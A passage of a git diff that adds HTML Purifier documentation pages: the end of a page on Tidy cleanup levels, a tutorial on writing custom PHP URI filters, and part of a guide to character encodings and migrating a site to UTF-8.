Tidy operates on the <strong>medium</strong> level. You can +change the level of cleaning by setting the %HTML.TidyLevel configuration +directive:</p> + +<pre>$config->set('HTML.TidyLevel', 'heavy'); // burn baby burn!</pre> + +<h2>Is the light level really light?</h2> + +<p>It depends on what doctype you're using. If your documents are HTML +4.01 <em>Transitional</em>, HTML Purifier will be lazy +and won't clean up your <code>center</code> +or <code>font</code> tags. But if you're using HTML 4.01 <em>Strict</em>, +HTML Purifier has no choice: it has to convert them, or they will +be nuked out of existence. So while light on Transitional will result +in little to no changes, light on Strict will still result in quite +a lot of fixes.</p> + +<p>This is different behavior from 1.6 or before, where deprecated +tags in transitional documents would +always be cleaned up regardless. This is also better behavior.</p> + +<h2>My pages look different!</h2> + +<p>HTML Purifier is tasked with converting deprecated tags and +attributes to standards-compliant alternatives, which usually +need copious amounts of CSS. It's also not foolproof: sometimes +things do get lost in the translation. This is why when HTML Purifier +can get away with not doing cleaning, it won't; this is why +the default value is <strong>medium</strong> and not heavy.</p> + +<p>Fortunately, only a few attributes have problems with the switch +over. They are described below:</p> + +<table class="table"> + <thead><tr> + <th>Element@Attr</th> + <th>Changes</th> + </tr></thead> + <tbody> + <tr> + <td>caption@align</td> + <td>Firefox supports stuffing the caption on the + left and right side of the table, a feature that + Internet Explorer, understandably, does not have. + When align equals right or left, the text will simply + be aligned on the left or right side.</td> + </tr> + <tr> + <td>img@align</td> + <td>The implementation for align bottom is good, but not + perfect. There are a few pixel differences.</td> + </tr> + <tr> + <td>br@clear</td> + <td>Clear both gets a little wonky in Internet Explorer. Haven't + really been able to figure out why.</td> + </tr> + <tr> + <td>hr@noshade</td> + <td>All browsers implement this slightly differently: we've + chosen to make noshade horizontal rules gray.</td> + </tr> + </tbody> +</table> + +<p>There are a few more minor, although irritating, bugs. +Some older browsers support deprecated attributes, +but not CSS. Transformed elements and attributes will look unstyled +to said browsers. Also, CSS precedence is slightly different for +inline styles versus presentational markup. In increasing precedence:</p> + +<ol> + <li>Presentational attributes</li> + <li>External style sheets</li> + <li>Inline styling</li> +</ol> + +<p>This means that styling that may have been masked by external CSS +declarations will start showing up (a good thing, perhaps). Finally, +if you've turned off the style attribute, almost all of +these transformations will not work. Sorry mates.</p> + +<p>You can review the rendering before and after of these transformations +by consulting the <a +href="http://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php +smoketest</a>.</p> + +<h2>I like the general idea, but the specifics bug me!</h2> + +<p>So you want HTML Purifier to clean up your HTML, but you're not +so happy about the br@clear implementation. That's perfectly fine! +HTML Purifier will make accomodations:</p> + +<pre>$config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); +$config->set('HTML.TidyLevel', 'heavy'); // all changes, minus... +<strong>$config->set('HTML.TidyRemove', 'br@clear');</strong></pre> + +<p>That third line does the magic, removing the br@clear fix +from the module, ensuring that <code><br clear="both" /></code> +will pass through unharmed. The reverse is possible too:</p> + +<pre>$config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); +$config->set('HTML.TidyLevel', 'none'); // no changes, plus... +<strong>$config->set('HTML.TidyAdd', 'p@align');</strong></pre> + +<p>In this case, all transformations are shut off, except for the p@align +one, which you found handy.</p> + +<p>To find out what the names of fixes you want to turn on or off are, +you'll have to consult the source code, specifically the files in +<code>HTMLPurifier/HTMLModule/Tidy/</code>. There is, however, a +general syntax:</p> + +<table class="table"> + <thead> + <tr> + <th>Name</th> + <th>Example</th> + <th>Interpretation</th> + </tr> + </thead> + <tbody> + <tr> + <td>element</td> + <td>font</td> + <td>Tag transform for <em>element</em></td> + </tr> + <tr> + <td>element@attr</td> + <td>br@clear</td> + <td>Attribute transform for <em>attr</em> on <em>element</em></td> + </tr> + <tr> + <td>@attr</td> + <td>@lang</td> + <td>Global attribute transform for <em>attr</em></td> + </tr> + <tr> + <td>e#content_model_type</td> + <td>blockquote#content_model_type</td> + <td>Change of child processing implementation for <em>e</em></td> + </tr> + </tbody> +</table> + +<h2>So... what's the lowdown?</h2> + +<p>The lowdown is, quite frankly, HTML Purifier's default settings are +probably good enough. The next step is to bump the level up to heavy, +and if that still doesn't satisfy your appetite, do some fine-tuning. +Other than that, don't worry about it: this all works silently and +effectively in the background.</p> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/enduser-uri-filter.html b/lib/htmlpurifier/docs/enduser-uri-filter.html new file mode 100644 index 000000000..d1b3354a3 --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-uri-filter.html @@ -0,0 +1,204 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Tutorial for creating custom URI filters." /> +<link rel="stylesheet" type="text/css" href="style.css" /> + +<title>URI Filters - HTML Purifier</title> + +</head><body> + +<h1>URI Filters</h1> + +<div id="filing">Filed under End-User</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p> + This is a quick and dirty document to get you on your way to writing + custom URI filters for your own URL filtering needs. Why would you + want to write a URI filter? If you need URIs your users put into + HTML to magically change into a different URI, this is + exactly what you need! +</p> + +<h2>Creating the class</h2> + +<p> + Any URI filter you make will be a subclass of <code>HTMLPurifier_URIFilter</code>. + The scaffolding is thus: +</p> + +<pre>class HTMLPurifier_URIFilter_<strong>NameOfFilter</strong> extends HTMLPurifier_URIFilter +{ + public $name = '<strong>NameOfFilter</strong>'; + public function prepare($config) {} + public function filter(&$uri, $config, $context) {} +}</pre> + +<p> + Fill in the variable <code>$name</code> with the name of your filter, and + take a look at the two methods. <code>prepare()</code> is an initialization + method that is called only once, before any filtering has been done of the + HTML. Use it to perform any costly setup work that only needs to be done + once. <code>filter()</code> is the guts and innards of our filter: + it takes the URI and does whatever needs to be done to it. +</p> + +<p> + If you've worked with HTML Purifier, you'll recognize the <code>$config</code> + and <code>$context</code> parameters. On the other hand, <code>$uri</code> + is something unique to this section of the application: it's a + <code>HTMLPurifier_URI</code> object. The interface is thus: +</p> + +<pre>class HTMLPurifier_URI +{ + public $scheme, $userinfo, $host, $port, $path, $query, $fragment; + public function HTMLPurifier_URI($scheme, $userinfo, $host, $port, $path, $query, $fragment); + public function toString(); + public function copy(); + public function getSchemeObj($config, $context); + public function validate($config, $context); +}</pre> + +<p> + The first three methods are fairly self-explanatory: you have a constructor, + a serializer, and a cloner. Generally, you won't be using them when + you are manipulating the URI objects themselves. + <code>getSchemeObj()</code> is a special purpose method that returns + a <code>HTMLPurifier_URIScheme</code> object corresponding to the specific + URI at hand. <code>validate()</code> performs general-purpose validation + on the internal components of a URI. Once again, you don't need to + worry about these: they've already been handled for you. +</p> + +<h2>URI format</h2> + +<p> + As a URIFilter, we're interested in the member variables of the URI object. +</p> + +<table class="quick"><tbody> + <tr><th>Scheme</th> <td>The protocol for identifying (and possibly locating) a resource (http, ftp, https)</td></tr> + <tr><th>Userinfo</th> <td>User information such as a username (bob)</td></tr> + <tr><th>Host</th> <td>Domain name or IP address of the server (example.com, 127.0.0.1)</td></tr> + <tr><th>Port</th> <td>Network port number for the server (80, 12345)</td></tr> + <tr><th>Path</th> <td>Data that identifies the resource, possibly hierarchical (/path/to, ed@example.com)</td></tr> + <tr><th>Query</th> <td>String of information to be interpreted by the resource (?q=search-term)</td></tr> + <tr><th>Fragment</th> <td>Additional information for the resource after retrieval (#bookmark)</td></tr> +</tbody></table> + +<p> + Because the URI is presented to us in this form, and not + <code>http://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us + a lot of trouble in having to parse the URI every time we want to filter + it. For the record, the above URI has the following components: +</p> + +<table class="quick"><tbody> + <tr><th>Scheme</th> <td>http</td></tr> + <tr><th>Userinfo</th> <td>bob</td></tr> + <tr><th>Host</th> <td>example.com</td></tr> + <tr><th>Port</th> <td>8080</td></tr> + <tr><th>Path</th> <td>/foo.php</td></tr> + <tr><th>Query</th> <td>q=string</td></tr> + <tr><th>Fragment</th> <td>hash</td></tr> +</tbody></table> + +<p> + Note that there is no question mark or octothorpe in the query or + fragment: these get removed during parsing. +</p> + +<p> + With this information, you can get straight to implementing your + <code>filter()</code> method. But one more thing... +</p> + +<h2>Return value: Boolean, not URI</h2> + +<p> + You may have noticed that the URI is being passed in by reference. + This means that whatever changes you make to it, those changes will + be reflected in the URI object the callee had. <strong>Do not + return the URI object: it is unnecessary and will cause bugs.</strong> + Instead, return a boolean value, true if the filtering was successful, + or false if the URI is beyond repair and needs to be axed. +</p> + +<p> + Let's suppose I wanted to write a filter that converted links with a + custom <code>image</code> scheme to its corresponding real path on + our website: +</p> + +<pre>class HTMLPurifier_URIFilter_TransformImageScheme extends HTMLPurifier_URIFilter +{ + public $name = 'TransformImageScheme'; + public function filter(&$uri, $config, $context) { + if ($uri->scheme !== 'image') return true; + $img_name = $uri->path; + // Overwrite the previous URI object + $uri = new HTMLPurifier_URI('http', null, null, null, '/img/' . $img_name . '.png', null, null); + return true; + } +}</pre> + +<p> + Notice I did not <code>return $uri;</code>. This filter would turn + <code>image:Foo</code> into <code>/img/Foo.png</code>. +</p> + +<h2>Activating your filter</h2> + +<p> + Having a filter is all well and good, but you need to tell HTML Purifier + to use it. Fortunately, this part's simple: +</p> + +<pre>$uri = $config->getDefinition('URI'); +$uri->addFilter(new HTMLPurifier_URIFilter_<strong>NameOfFilter</strong>(), $config);</pre> + +<p> + After adding a filter, you won't be able to set configuration directives. + Structure your code accordingly. +</p> + +<!-- XXX: link to new documentation system --> + +<h2>Post-filter</h2> + +<p> + Remember our TransformImageScheme filter? That filter acted before we had + performed scheme validation; otherwise, the URI would have been filtered + out when it was discovered that there was no image scheme. Well, a post-filter + is run after scheme specific validation, so it's ideal for bulk + post-processing of URIs, including munging. To specify a URI as a post-filter, + set the <code>$post</code> member variable to TRUE. +</p> + +<pre>class HTMLPurifier_URIFilter_MyPostFilter extends HTMLPurifier_URIFilter +{ + public $name = 'MyPostFilter'; + public $post = true; + // ... extra code here +} +</pre> + +<h2>Examples</h2> + +<p> + Check the + <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a> + directory for more implementation examples, and see <a href="proposal-new-directives.txt">the + new directives proposal document</a> for ideas on what could be implemented + as a filter. +</p> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/enduser-utf8.html b/lib/htmlpurifier/docs/enduser-utf8.html new file mode 100644 index 000000000..9b01a302a --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-utf8.html @@ -0,0 +1,1060 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Describes the rationale for using UTF-8, the ramifications otherwise, and how to make the switch." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> +<style type="text/css"> + .minor td {font-style:italic;} +</style> + +<title>UTF-8: The Secret of Character Encoding - HTML Purifier</title> + +<!-- Note to users: this document, though professing to be UTF-8, attempts +to use only ASCII characters, because most webservers are configured +to send HTML as ISO-8859-1. So I will, many times, go against my +own advice for sake of portability. --> + +</head><body> + +<h1>UTF-8: The Secret of Character Encoding</h1> + +<div id="filing">Filed under End-User</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>Character encoding and character sets are not that +difficult to understand, but so many people blithely stumble +through the worlds of programming without knowing what to actually +do about it, or say "Ah, it's a job for those <em>internationalization</em> +experts." No, it is not! This document will walk you through +determining the encoding of your system and how you should handle +this information. It will stay away from excessive discussion on +the internals of character encoding.</p> + +<p>This document is not designed to be read in its entirety: it will +slowly introduce concepts that build on each other: you need not get to +the bottom to have learned something new. However, I strongly +recommend you read all the way to <strong>Why UTF-8?</strong>, because at least +at that point you'd have made a conscious decision not to migrate, +which can be a rewarding (but difficult) task.</p> + +<blockquote class="aside"> +<div class="label">Asides</div> + <p>Text in this formatting is an <strong>aside</strong>, + interesting tidbits for the curious but not strictly necessary material to + do the tutorial. If you read this text, you'll come out + with a greater understanding of the underlying issues.</p> +</blockquote> + +<h2>Table of Contents</h2> + +<ol id="toc"> + <li><a href="#findcharset">Finding the real encoding</a></li> + <li><a href="#findmetacharset">Finding the embedded encoding</a></li> + <li><a href="#fixcharset">Fixing the encoding</a><ol> + <li><a href="#fixcharset-none">No embedded encoding</a></li> + <li><a href="#fixcharset-diff">Embedded encoding disagrees</a></li> + <li><a href="#fixcharset-server">Changing the server encoding</a><ol> + <li><a href="#fixcharset-server-php">PHP header() function</a></li> + <li><a href="#fixcharset-server-phpini">PHP ini directive</a></li> + <li><a href="#fixcharset-server-nophp">Non-PHP</a></li> + <li><a href="#fixcharset-server-htaccess">.htaccess</a></li> + <li><a href="#fixcharset-server-ext">File extensions</a></li> + </ol></li> + <li><a href="#fixcharset-xml">XML</a></li> + <li><a href="#fixcharset-internals">Inside the process</a></li> + </ol></li> + <li><a href="#whyutf8">Why UTF-8?</a><ol> + <li><a href="#whyutf8-i18n">Internationalization</a></li> + <li><a href="#whyutf8-user">User-friendly</a></li> + <li><a href="#whyutf8-forms">Forms</a><ol> + <li><a href="#whyutf8-forms-urlencoded">application/x-www-form-urlencoded</a></li> + <li><a href="#whyutf8-forms-multipart">multipart/form-data</a></li> + </ol></li> + <li><a href="#whyutf8-support">Well supported</a></li> + <li><a href="#whyutf8-htmlpurifier">HTML Purifiers</a></li> + </ol></li> + <li><a href="#migrate">Migrate to UTF-8</a><ol> + <li><a href="#migrate-db">Configuring your database</a><ol> + <li><a href="#migrate-db-legit">Legit method</a></li> + <li><a href="#migrate-db-binary">Binary</a></li> + </ol></li> + <li><a href="#migrate-editor">Text editor</a></li> + <li><a href="#migrate-bom">Byte Order Mark (headers already sent!)</a></li> + <li><a href="#migrate-fonts">Fonts</a><ol> + <li><a href="#migrate-fonts-obscure">Obscure scripts</a></li> + <li><a href="#migrate-fonts-occasional">Occasional use</a></li> + </ol></li> + <li><a href="#migrate-variablewidth">Dealing with variable width in functions</a></li> + </ol></li> + <li><a href="#externallinks">Further Reading</a></li> +</ol> + +<h2 id="findcharset">Finding the real encoding</h2> + +<p>In the beginning, there was ASCII, and things were simple. But they +weren't good, for no one could write in Cyrillic or Thai. So there +exploded a proliferation of character encodings to remedy the problem +by extending the characters ASCII could express. This ridiculously +simplified version of the history of character encodings shows us that +there are now many character encodings floating around.</p> + +<blockquote class="aside"> + <p>A <strong>character encoding</strong> tells the computer how to + interpret raw zeroes and ones into real characters. It + usually does this by pairing numbers with characters.</p> + <p>There are many different types of character encodings floating + around, but the ones we deal most frequently with are ASCII, + 8-bit encodings, and Unicode-based encodings.</p> + <ul> + <li><strong>ASCII</strong> is a 7-bit encoding based on the + English alphabet.</li> + <li><strong>8-bit encodings</strong> are extensions to ASCII + that add a potpourri of useful, non-standard characters + like é and æ. They can only add 127 characters, + so usually only support one script at a time. When you + see a page on the web, chances are it's encoded in one + of these encodings.</li> + <li><strong>Unicode-based encodings</strong> implement the + Unicode standard and include UTF-8, UTF-16 and UTF-32/UCS-4. + They go beyond 8-bits and support almost + every language in the world. UTF-8 is gaining traction + as the dominant international encoding of the web.</li> + </ul> +</blockquote> + +<p>The first step of our journey is to find out what the encoding of +your website is. The most reliable way is to ask your +browser:</p> + +<dl> + <dt>Mozilla Firefox</dt> + <dd>Tools > Page Info: Encoding</dd> + <dt>Internet Explorer</dt> + <dd>View > Encoding: bulleted item is unofficial name</dd> +</dl> + +<p>Internet Explorer won't give you the MIME (i.e. useful/real) name of the +character encoding, so you'll have to look it up using their description. +Some common ones:</p> + +<table class="table"> + <thead><tr> + <th>IE's Description</th> + <th>Mime Name</th> + </tr></thead> + <tbody> + <tr><th colspan="2">Windows</th></tr> + <tr><td>Arabic (Windows)</td><td>Windows-1256</td></tr> + <tr><td>Baltic (Windows)</td><td>Windows-1257</td></tr> + <tr><td>Central European (Windows)</td><td>Windows-1250</td></tr> + <tr><td>Cyrillic (Windows)</td><td>Windows-1251</td></tr> + <tr><td>Greek (Windows)</td><td>Windows-1253</td></tr> + <tr><td>Hebrew (Windows)</td><td>Windows-1255</td></tr> + <tr><td>Thai (Windows)</td><td>TIS-620</td></tr> + <tr><td>Turkish (Windows)</td><td>Windows-1254</td></tr> + <tr><td>Vietnamese (Windows)</td><td>Windows-1258</td></tr> + <tr><td>Western European (Windows)</td><td>Windows-1252</td></tr> + </tbody> + <tbody> + <tr><th colspan="2">ISO</th></tr> + <tr><td>Arabic (ISO)</td><td>ISO-8859-6</td></tr> + <tr><td>Baltic (ISO)</td><td>ISO-8859-4</td></tr> + <tr><td>Central European (ISO)</td><td>ISO-8859-2</td></tr> + <tr><td>Cyrillic (ISO)</td><td>ISO-8859-5</td></tr> + <tr class="minor"><td>Estonian (ISO)</td><td>ISO-8859-13</td></tr> + <tr class="minor"><td>Greek (ISO)</td><td>ISO-8859-7</td></tr> + <tr><td>Hebrew (ISO-Logical)</td><td>ISO-8859-8-l</td></tr> + <tr><td>Hebrew (ISO-Visual)</td><td>ISO-8859-8</td></tr> + <tr class="minor"><td>Latin 9 (ISO)</td><td>ISO-8859-15</td></tr> + <tr class="minor"><td>Turkish (ISO)</td><td>ISO-8859-9</td></tr> + <tr><td>Western European (ISO)</td><td>ISO-8859-1</td></tr> + </tbody> + <tbody> + <tr><th colspan="2">Other</th></tr> + <tr><td>Chinese Simplified (GB18030)</td><td>GB18030</td></tr> + <tr><td>Chinese Simplified (GB2312)</td><td>GB2312</td></tr> + <tr><td>Chinese Simplified (HZ)</td><td>HZ</td></tr> + <tr><td>Chinese Traditional (Big5)</td><td>Big5</td></tr> + <tr><td>Japanese (Shift-JIS)</td><td>Shift_JIS</td></tr> + <tr><td>Japanese (EUC)</td><td>EUC-JP</td></tr> + <tr><td>Korean</td><td>EUC-KR</td></tr> + <tr><td>Unicode (UTF-8)</td><td>UTF-8</td></tr> + </tbody> +</table> + +<p>Internet Explorer does not recognize some of the more obscure +character encodings, and having to lookup the real names with a table +is a pain, so I recommend using Mozilla Firefox to find out your +character encoding.</p> + +<h2 id="findmetacharset">Finding the embedded encoding</h2> + +<p>At this point, you may be asking, "Didn't we already find out our +encoding?" Well, as it turns out, there are multiple places where +a web developer can specify a character encoding, and one such place +is in a <code>META</code> tag:</p> + +<pre><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /></pre> + +<p>You'll find this in the <code>HEAD</code> section of an HTML document. +The text to the right of <code>charset=</code> is the "claimed" +encoding: the HTML claims to be this encoding, but whether or not this +is actually the case depends on other factors. For now, take note +if your <code>META</code> tag claims that either:</p> + +<ol> + <li>The character encoding is the same as the one reported by the + browser,</li> + <li>The character encoding is different from the browser's, or</li> + <li>There is no <code>META</code> tag at all! (horror, horror!)</li> +</ol> + +<h2 id="fixcharset">Fixing the encoding</h2> + +<p class="aside">The advice given here is for pages being served as +vanilla <code>text/html</code>. Different practices must be used +for <code>application/xml</code> or <code>application/xml+xhtml</code>, see +<a href="http://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's +document on XHTML media types</a> for more information.</p> + +<p>If your <code>META</code> encoding and your real encoding match, +savvy! You can skip this section. If they don't...</p> + +<h3 id="fixcharset-none">No embedded encoding</h3> + +<p>If this is the case, you'll want to add in the appropriate +<code>META</code> tag to your website. It's as simple as copy-pasting +the code snippet above and replacing UTF-8 with whatever is the mime name +of your real encoding.</p> + +<blockquote class="aside"> + <p>For all those skeptics out there, there is a very good reason + why the character encoding should be explicitly stated. When the + browser isn't told what the character encoding of a text is, it + has to guess: and sometimes the guess is wrong. Hackers can manipulate + this guess in order to slip XSS past filters and then fool the + browser into executing it as active code. A great example of this + is the <a href="http://shiflett.org/archive/177">Google UTF-7 + exploit</a>.</p> + <p>You might be able to get away with not specifying a character + encoding with the <code>META</code> tag as long as your webserver + sends the right Content-Type header, but why risk it? Besides, if + the user downloads the HTML file, there is no longer any webserver + to define the character encoding.</p> +</blockquote> + +<h3 id="fixcharset-diff">Embedded encoding disagrees</h3> + +<p>This is an extremely common mistake: another source is telling +the browser what the +character encoding is and is overriding the embedded encoding. This +source usually is the Content-Type HTTP header that the webserver (i.e. +Apache) sends. A usual Content-Type header sent with a page might +look like this:</p> + +<pre>Content-Type: text/html; charset=ISO-8859-1</pre> + +<p>Notice how there is a charset parameter: this is the webserver's +way of telling a browser what the character encoding is, much like +the <code>META</code> tags we touched upon previously.</p> + +<blockquote class="aside"><p>In fact, the <code>META</code> tag is +designed as a substitute for the HTTP header for contexts where +sending headers is impossible (such as locally stored files without +a webserver). Thus the name <code>http-equiv</code> (HTTP equivalent). +</p></blockquote> + +<p>There are two ways to go about fixing this: changing the <code>META</code> +tag to match the HTTP header, or changing the HTTP header to match +the <code>META</code> tag. How do we know which to do? It depends +on the website's content: after all, headers and tags are only ways of +describing the actual characters on the web page.</p> + +<p>If your website:</p> + +<dl> + <dt>...only uses ASCII characters,</dt> + <dd>Either way is fine, but I recommend switching both to + UTF-8 (more on this later).</dd> + <dt>...uses special characters, and they display + properly,</dt> + <dd>Change the embedded encoding to the server encoding.</dd> + <dt>...uses special characters, but users often complain that + they come out garbled,</dt> + <dd>Change the server encoding to the embedded encoding.</dd> +</dl> + +<p>Changing a META tag is easy: just swap out the old encoding +for the new. Changing the server (HTTP header) encoding, however, +is slightly more difficult.</p> + +<h3 id="fixcharset-server">Changing the server encoding</h3> + +<h4 id="fixcharset-server-php">PHP header() function</h4> + +<p>The simplest way to handle this problem is to send the encoding +yourself, via your programming language. Since you're using HTML +Purifier, I'll assume PHP, although it's not too difficult to do +similar things in +<a href="http://www.w3.org/International/O-HTTP-charset#scripting">other +languages</a>. The appropriate code is:</p> + +<pre><a href="http://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre> + +<p>...replacing UTF-8 with whatever your embedded encoding is. +This code must come before any output, so be careful about +stray whitespace in your application (i.e., any whitespace before +output excluding whitespace within <?php ?> tags).</p> + +<h4 id="fixcharset-server-phpini">PHP ini directive</h4> + +<p>PHP also has a neat little ini directive that can save you a +header call: <code><a href="http://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p> + +<pre><a href="http://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre> + +<p>...will also do the trick. If PHP is running as an Apache module (and +not as FastCGI, consult +<a href="http://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property +across many PHP files:</p> + +<pre><a href="http://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset "UTF-8"</pre> + +<blockquote class="aside"><p>As with all INI directives, this can +also go in your php.ini file. Some hosting providers allow you to customize +your own php.ini file, ask your support for details. Use:</p> +<pre>default_charset = "utf-8"</pre></blockquote> + +<h4 id="fixcharset-server-nophp">Non-PHP</h4> + +<p>You may, for whatever reason, need to set the character encoding +on non-PHP files, usually plain ol' HTML files. Doing this +is more of a hit-or-miss process: depending on the software being +used as a webserver and the configuration of that software, certain +techniques may work, or may not work.</p> + +<h4 id="fixcharset-server-htaccess">.htaccess</h4> + +<p>On Apache, you can use an .htaccess file to change the character +encoding. I'll defer to +<a href="http://www.w3.org/International/questions/qa-htaccess-charset">W3C</a> +for the in-depth explanation, but it boils down to creating a file +named .htaccess with the contents:</p> + +<pre><a href="http://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre> + +<p>Where UTF-8 is replaced with the character encoding you want to +use and .html is a file extension that this will be applied to. This +character encoding will then be set for any file directly in +or in the subdirectories of directory you place this file in.</p> + +<p>If you're feeling particularly courageous, you can use:</p> + +<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre> + +<p>...which changes the character set Apache adds to any document that +doesn't have any Content-Type parameters. This directive, which the +default configuration file sets to iso-8859-1 for security +reasons, is probably why your headers mismatch +with the <code>META</code> tag. If you would prefer Apache not to be +butting in on your character encodings, you can tell it not +to send anything at all:</p> + +<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre> + +<p>...making your internal charset declaration (usually the <code>META</code> tags) +the sole source of character encoding +information. In these cases, it is <em>especially</em> important to make +sure you have valid <code>META</code> tags on your pages and all the +text before them is ASCII.</p> + +<blockquote class="aside"><p>These directives can also be +placed in httpd.conf file for Apache, but +in most shared hosting situations you won't be able to edit this file. +</p></blockquote> + +<h4 id="fixcharset-server-ext">File extensions</h4> + +<p>If you're not allowed to use .htaccess files, you can often +piggy-back off of Apache's default AddCharset declarations to get +your files in the proper extension. Here are Apache's default +character set declarations:</p> + +<table class="table"> + <thead><tr> + <th>Charset</th> + <th>File extension(s)</th> + </tr></thead> + <tbody> + <tr><td>ISO-8859-1</td><td>.iso8859-1 .latin1</td></tr> + <tr><td>ISO-8859-2</td><td>.iso8859-2 .latin2 .cen</td></tr> + <tr><td>ISO-8859-3</td><td>.iso8859-3 .latin3</td></tr> + <tr><td>ISO-8859-4</td><td>.iso8859-4 .latin4</td></tr> + <tr><td>ISO-8859-5</td><td>.iso8859-5 .latin5 .cyr .iso-ru</td></tr> + <tr><td>ISO-8859-6</td><td>.iso8859-6 .latin6 .arb</td></tr> + <tr><td>ISO-8859-7</td><td>.iso8859-7 .latin7 .grk</td></tr> + <tr><td>ISO-8859-8</td><td>.iso8859-8 .latin8 .heb</td></tr> + <tr><td>ISO-8859-9</td><td>.iso8859-9 .latin9 .trk</td></tr> + <tr><td>ISO-2022-JP</td><td>.iso2022-jp .jis</td></tr> + <tr><td>ISO-2022-KR</td><td>.iso2022-kr .kis</td></tr> + <tr><td>ISO-2022-CN</td><td>.iso2022-cn .cis</td></tr> + <tr><td>Big5</td><td>.Big5 .big5 .b5</td></tr> + <tr><td>WINDOWS-1251</td><td>.cp-1251 .win-1251</td></tr> + <tr><td>CP866</td><td>.cp866</td></tr> + <tr><td>KOI8-r</td><td>.koi8-r .koi8-ru</td></tr> + <tr><td>KOI8-ru</td><td>.koi8-uk .ua</td></tr> + <tr><td>ISO-10646-UCS-2</td><td>.ucs2</td></tr> + <tr><td>ISO-10646-UCS-4</td><td>.ucs4</td></tr> + <tr><td>UTF-8</td><td>.utf8</td></tr> + <tr><td>GB2312</td><td>.gb2312 .gb </td></tr> + <tr><td>utf-7</td><td>.utf7</td></tr> + <tr><td>EUC-TW</td><td>.euc-tw</td></tr> + <tr><td>EUC-JP</td><td>.euc-jp</td></tr> + <tr><td>EUC-KR</td><td>.euc-kr</td></tr> + <tr><td>shift_jis</td><td>.sjis</td></tr> + </tbody> +</table> + +<p>So, for example, a file named <code>page.utf8.html</code> or +<code>page.html.utf8</code> will probably be sent with the UTF-8 charset +attached, the difference being that if there is an +<code>AddCharset charset .html</code> declaration, it will override +the .utf8 extension in <code>page.utf8.html</code> (precedence moves +from right to left). By default, Apache has no such declaration.</p> + +<h4 id="fixcharset-server-iis">Microsoft IIS</h4> + +<p>If anyone can contribute information on how to configure Microsoft +IIS to change character encodings, I'd be grateful.</p> + +<h3 id="fixcharset-xml">XML</h3> + +<p><code>META</code> tags are the most common source of embedded +encodings, but they can also come from somewhere else: XML +Declarations. They look like:</p> + +<pre><?xml version="1.0" encoding="UTF-8"?></pre> + +<p>...and are most often found in XML documents (including XHTML).</p> + +<p>For XHTML, this XML Declaration theoretically +overrides the <code>META</code> tag. In reality, this happens only when the +XHTML is actually served as legit XML and not HTML, which is almost always +never due to Internet Explorer's lack of support for +<code>application/xhtml+xml</code> (even though doing so is often +argued to be <a href="http://www.hixie.ch/advocacy/xhtml">good +practice</a> and is required by the XHTML 1.1 specification).</p> + +<p>For XML, however, this XML Declaration is extremely important. +Since most webservers are not configured to send charsets for .xml files, +this is the only thing a parser has to go on. Furthermore, the default +for XML files is UTF-8, which often butts heads with more common +ISO-8859-1 encoding (you see this in garbled RSS feeds).</p> + +<p>In short, if you use XHTML and have gone through the +trouble of adding the XML Declaration, make sure it jives +with your <code>META</code> tags (which should only be present +if served in text/html) and HTTP headers.</p> + +<h3 id="fixcharset-internals">Inside the process</h3> + +<p>This section is not required reading, +but may answer some of your questions on what's going on in all +this character encoding hocus pocus. If you're interested in +moving on to the next phase, skip this section.</p> + +<p>A logical question that follows all of our wheeling and dealing +with multiple sources of character encodings is "Why are there +so many options?" To answer this question, we have to turn +back our definition of character encodings: they allow a program +to interpret bytes into human-readable characters.</p> + +<p>Thus, a chicken-egg problem: a character encoding +is necessary to interpret the +text of a document. A <code>META</code> tag is in the text of a document. +The <code>META</code> tag gives the character encoding. How can we +determine the contents of a <code>META</code> tag, inside the text, +if we don't know it's character encoding? And how do we figure out +the character encoding, if we don't know the contents of the +<code>META</code> tag?</p> + +<p>Fortunately for us, the characters we need to write the +<code>META</code> are in ASCII, which is pretty much universal +over every character encoding that is in common use today. So, +all the web-browser has to do is parse all the way down until +it gets to the Content-Type tag, extract the character encoding +tag, then re-parse the document according to this new information.</p> + +<p>Obviously this is complicated, so browsers prefer the simpler +and more efficient solution: get the character encoding from a +somewhere other than the document itself, i.e. the HTTP headers, +much to the chagrin of HTML authors who can't set these headers.</p> + +<h2 id="whyutf8">Why UTF-8?</h2> + +<p>So, you've 